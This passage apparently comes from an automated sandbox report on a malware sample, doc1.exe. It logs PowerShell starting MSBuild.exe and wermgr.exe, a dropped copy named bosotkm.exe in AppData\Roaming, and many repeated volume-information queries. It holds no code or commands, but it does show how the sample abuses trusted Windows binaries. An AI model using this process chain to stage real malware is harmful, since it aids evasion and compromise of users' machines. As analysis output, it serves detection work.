                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2744" "2812" "2240" "2816" "0" "0" "2820" "0" "0" "0" "0" "0"
                  Source: C:\Users\user\Desktop\doc1.exeQueries volume information: C:\Users\user\Desktop\doc1.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeQueries volume information: C:\Users\user\AppData\Roaming\bosotkm.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeQueries volume information: C:\Users\user\AppData\Roaming\bosotkm.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
